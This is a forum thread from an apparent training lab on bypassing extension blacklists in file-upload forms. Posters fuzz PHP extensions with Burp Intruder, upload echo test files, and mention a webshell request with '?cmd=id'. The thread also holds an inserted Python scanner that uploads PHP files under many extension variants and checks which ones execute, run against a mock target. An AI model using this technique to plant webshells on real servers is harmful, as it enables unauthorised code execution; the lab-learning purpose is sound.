FILE UPLOAD ATTACKS: Blacklist Filters

Hello everyone!
I faced an issue and can't pass this task. What was done:

  • Created a file for injection to find out where the page is:
<?php echo 'Backdoor is here!!!'; ?>
  • Intercepted the request with Burp → go to Intruder. Tried all PHP extensions: php, phps, php3, php4, php5, phtml, phtm. Only php, phps, php5 and phtml are blocked on the server. Tried to use the others: the file uploads, but the page doesn't show my output → the file is there but doesn't execute on the server

  • Tried Intruder with other methods: pHp, php%00, php\x00 - doesn't work, and I don't know how to send requests for files with a %00 extension, etc…

Do you have any hints/ideas what to try and what I’m doing wrong?


Hope you got the answer by now… Just in case you haven't, try and make use of the cheat sheet resources.

PHP Extensions

Make use of this extension list as your intruder payload. Also make sure to untick URL encoding. After uploading you can use intruder again to look for the files you have uploaded. See which extension gives you back the result you were expecting.

Hope this is helpful…
Happy Hacking!!!


Thank you for a good tip!
My error was in not using this list, plus I hadn't used Intruder when performing the GET request. Now I've found a working extension, thank you 🙂


Hey, I am curious what you mean by "Intruder with GET request", because I am only seeing a POST that the attack can be run on. Also I am having trouble: I used the list he mentioned and I am still not seeing them reflected on the server.

Hi!
We're using a POST request to upload our file, but to exploit it, we have to use a GET request with the path to our file.
Please describe how you're using Burp, whether you have disabled URL encoding of the request, etc.
For me, the biggest problem was there 🙂 The PHP extension can be easily found from that list above, or you can create that list with additional characters as in my first message in the thread.
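The procedure the thread converges on (POST each candidate extension, then GET the uploaded path and check whether the PHP actually ran rather than just landed on disk) is easy to get wrong by hand, because "uploaded" and "executed" are two separate outcomes. The script below is an added example, not code from the thread or from the lab; it separates the three verdicts a practitioner cares about (blocked by the filter, stored but served back as source, stored and executed) and runs offline against a constructed `FakeTarget`. The fake target's blacklist (php, phps, php5, phtml, compared case-insensitively on the last extension) is an assumption chosen to mirror what the first post observed, and its "handler" executes only names matching the stock Debian `mod_php` pattern `.+\.ph(ar|p|tml)$`, which is an assumption about the lab, not something the thread states. The extension list is assembled here in the spirit of the cheat sheet linked above, not copied from it. Against a real target, `upload` and `fetch` would be thin wrappers around an HTTP client; the same `classify` logic applies.

```python
import re
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, str]               # (HTTP status, response body)
Upload = Callable[[str, str], Response]  # upload(filename, content) -> Response
Fetch = Callable[[str], Response]        # fetch(path) -> Response

# Candidate extensions (assembled here, not copied from the cheat sheet).
BASE_EXTENSIONS = ["php", "phps", "php3", "php4", "php5", "php7",
                   "phtml", "phtm", "phar", "pht", "phpt", "pgif", "inc"]


def variants(ext: str) -> List[str]:
    """Mutations worth trying per extension: as-is, upper-case,
    alternating case (pHp) and a double extension (php.jpg)."""
    alternating = "".join(c.upper() if i % 2 else c for i, c in enumerate(ext))
    return [ext, ext.upper(), alternating, f"{ext}.jpg"]


def classify(upload_resp: Response, fetch_resp: Response, marker: str) -> str:
    """One verdict per probe: blocked / missing / source / executed."""
    if upload_resp[0] >= 400:
        return "blocked"                 # filter rejected the name
    status, body = fetch_resp
    if status == 404:
        return "missing"                 # accepted, but not where we looked
    if marker in body and "<?php" not in body:
        return "executed"                # the interpreter ran our echo
    if "<?php" in body:
        return "source"                  # stored, handed back verbatim
    return "other"


def scan(upload: Upload, fetch: Fetch, upload_dir: str = "/uploads/") -> Dict[str, str]:
    """Upload a marker file under every variant, then GET it back and classify."""
    results: Dict[str, str] = {}
    for ext in BASE_EXTENSIONS:
        for v in variants(ext):
            name, marker = f"probe.{v}", f"MARK-{v}"
            up = upload(name, f"<?php echo '{marker}'; ?>")
            fe = fetch(upload_dir + name) if up[0] < 400 else (404, "")
            results[v] = classify(up, fe, marker)
    return results


def executed(results: Dict[str, str]) -> List[str]:
    """Only the variants that actually ran PHP: the ones worth a webshell."""
    return [v for v, verdict in results.items() if verdict == "executed"]


class FakeTarget:
    r"""Constructed stand-in for the lab (assumption, not the real app):
    case-insensitive blacklist on the last extension, and 'execution' only
    for names matching Debian's stock mod_php handler .+\.ph(ar|p|tml)$."""
    BLACKLIST = {"php", "phps", "php5", "phtml"}
    HANDLER = re.compile(r".+\.ph(ar|p|tml)$")

    def __init__(self) -> None:
        self.files: Dict[str, str] = {}

    def upload(self, filename: str, content: str) -> Response:
        if filename.rsplit(".", 1)[-1].lower() in self.BLACKLIST:
            return 400, "Extension not allowed"
        self.files[filename] = content
        return 200, "File uploaded"

    def fetch(self, path: str) -> Response:
        name = path.rsplit("/", 1)[-1]
        if name not in self.files:
            return 404, ""
        src = self.files[name]
        if self.HANDLER.search(name):
            # Minimal "interpreter": evaluates <?php echo '...'; ?> only.
            return 200, re.sub(r"<\?php\s+echo\s+'([^']*)';\s*\?>", r"\1", src)
        return 200, src                  # static file: source comes back


def demo() -> Dict[str, str]:
    t = FakeTarget()
    return scan(t.upload, t.fetch)


if __name__ == "__main__":
    for v, verdict in demo().items():
        print(f"{v:12} {verdict}")
```

Two things this makes concrete. First, a verdict of `source` is exactly the situation later posts describe (the file is served back, or downloaded, instead of run): the filter let the name through, but nothing on the server treats it as PHP, so that extension is a dead end. Second, if you drive this with Burp Intruder instead, the payload-encoding caveat from the earlier reply matters: with "URL-encode these characters" ticked, a payload such as `php%00` is sent as `php%2500`, so untick it before trusting a negative result.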

Hi,

I have identified the extensions which are not blocked, but the PHP code is not executing. Could you please give me some hint?


I had a lot of problems with this task. Eventually, after many resets of the machine, it started working.

If anybody is stuck, I will try to assist you. Just shoot me a message.

John

I'm confused. I fuzzed with ffuf and Burp and I tried different extensions:


php4,php2,php.jpg

I was able to upload them but they couldn’t be executed.


shell1.php.jpg?cmd=id” cannot be displayed because it contains errors.

I am also getting the same issue. After fuzzing the extensions, so many successful extensions are getting uploaded, but when we call the file, the file is downloaded instead of executing the PHP code. I tried with PHP hello world code also:

<?php echo "Hello world" ?>

The file is uploading but not executing the PHP code. I have tried so many times over so many days, but I am still getting the same issue.

Same issue here. When I upload the file with a good extension, the response doesn't execute the PHP code; it only shows the PHP code.